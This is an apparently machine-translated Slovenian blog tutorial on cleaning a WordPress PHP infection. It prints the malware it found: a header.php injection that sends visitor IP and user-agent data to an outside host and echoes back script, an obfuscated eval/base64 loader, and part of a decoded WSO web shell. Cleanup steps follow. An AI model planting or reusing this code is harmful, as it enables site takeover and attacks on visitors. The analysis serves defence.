odstrani WordPress PHP Virus

Ta vadnica predstavlja poseben primer spletnega dnevnika WordPress bilo je okuženo. Odstranitev WordPress PHP virus.

Pred dnevi sem opazil sumljivo kodo, za katero se zdi, da je virus PHP WordPress. Naslednja koda PHP je bila prisotna v header.php, pred vrstico </head>.

<?php $wp_rssh = 'http'; $wp_gt = 'web'; error_reporting(0); ini_set('display_errors',0); $wp_uagent = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){
$wp_gturl=$wp_rssh."://".$wp_gt.$wp_rssh."s.com/".$wp_gt."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_gturl);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10); $wp_cntnt = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_cntnt,1,3) === 'scr' ){ echo $wp_cntnt; } ?>

To je koda PHP, ki je videti, kot da poskuša pridobiti vsebino vira iz zunanjega strežnika, vendar je del, ki se nanaša na URL, nepopoln.

Delovni mehanizem je nekoliko bolj zapleten in omogoča to WordPress Virus PHP neviden obiskovalcem prizadetih spletnih mest. Namesto tega cilja na iskalnike (Google) in implicitno vodi do znatnega zmanjšanja števila obiskovalcev prizadetih spletnih mest.

Podrobnosti o zlonamerni programski opremi WordPress PHP Virus

1. Zgornja koda je prisotna v header.php.

2. Na strežniku se je pojavila datoteka wp-log.php v mapi wp-includes.

3. wp-log.php vsebuje šifrirano kodo, ki pa jo je relativno enostavno dešifrirati.

<?php eval(gzinflate(base64_decode('7b1rd../Fw=='))) ?>

Dešifrirajte kodo zlonamerne programske opreme iz wp-log.php :

<?php
$auth_pass = "md5password";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
#+Dump Columns ////Boolean
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler" );
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');

if(get_magic_quotes_gpc()) {
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
    die("
<pre align=center-->

<form method="post"><input name="pass" type="password" /><input type="submit" value="" /></form>" );
}

function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}

if(!empty($auth_pass)) {
if(isset($_POST['pass']) &amp;&amp; (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == "win" )
$os = 'win';
else
$os = 'nix';

$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';
?>

Zdi se, da gre za zlonamerni skript PHP, ki vsebuje kodo za preverjanje pristnosti in dejanja v datotekah in imenikih na strežniku. Zelo preprosto je razvidno, da ta skript vsebuje spremenljivke, kot je $auth_pass (geslo za preverjanje pristnosti), $default_action (privzeto dejanje), $default_use_ajax (privzeto uporablja Ajax) in $default_charset (privzeta nastavitev znakov).

Očitno ima ta skript razdelek, ki preverja uporabniške agente HTTP, da blokirajo dostop do določenih spletnih robotov, kot so iskalniki. Ima tudi razdelek, ki preverja varnostni način PHP in nastavlja določene delovne imenike.

4. Če v brskalniku dostopate do wp-log.php, se prikaže spletna stran s poljem preverjanje pristnosti. Na prvi pogled se zdi, da gre za upravitelja datotek, prek katerega je mogoče enostavno naložiti nove datoteke na ciljni strežnik.

Kako devirusirate spletno stran WordPress?

Postopek ročnega odstranjevanja virusov vedno vključuje najprej odkrivanje in razumevanje ranljivosti.

1. Ustvarite varnostno kopijo za celotno spletno mesto. To mora vključevati tako datoteke kot bazo podatkov.

2. Približno ugotovite, kako dolgo je virus že prisoten, in poiščite v spletnem strežniku spremenjene ali novo ustvarjene datoteke v približnem časovnem okviru.

Na primer, če želite videti datoteke .php ustvarjeno ali spremenjeno v zadnjem tednu, zaženite ukaz v strežniku:

find /your/web/path -type f -mtime -7 -exec ls -l {} \; | grep "\.php$"

To je preprosta metoda, s katero lahko odkrijete datoteke WordPress okužene in tiste, ki vsebujejo zlonamerno kodo.

3. Preverite datoteko .htaccess sumljivih direktiv. Vrstice dovoljenj ali izvajanje skripta.

4. Preverite bazo podatkov. Povsem mogoče je, da nekatere objave in strani WordPress urediti z zlonamerno programsko opremo ali dodati novo uporabniki z vlogo administrator.

5. Preverite dovoljenja za pisanje za mape in datoteke. chmod şi chown.

Priporočena dovoljenja so: 644 za datoteke in 755 za imenike.

find /web/root/public/ -type f -exec chmod 644 {} \;
find /web/root/public/ -type d -exec chmod 755 {} \;

6. Posodobite vse WordPress Plugins / WordPress Themes.

Povezano: Fix Redirect WordPress Hack 2023 (Virus Redirect)

To so "osnovne" metode, s katerimi lahko devirusirate spletno stran/blog WordPress. Če imate težave in potrebujete pomoč, je odprt razdelek za komentarje.

Strasten do tehnologije, z veseljem pišem na StealthSettings.com od leta 2006. Imam bogate izkušnje s operacijskimi sistemi: macOS, Windows in Linux, ter programskimi jeziki in platformami za bloganje (WordPress) in za spletne trgovine (WooCommerce, Magento, PrestaShop).

kako » WordPress » odstrani WordPress PHP Virus
Pustite komentar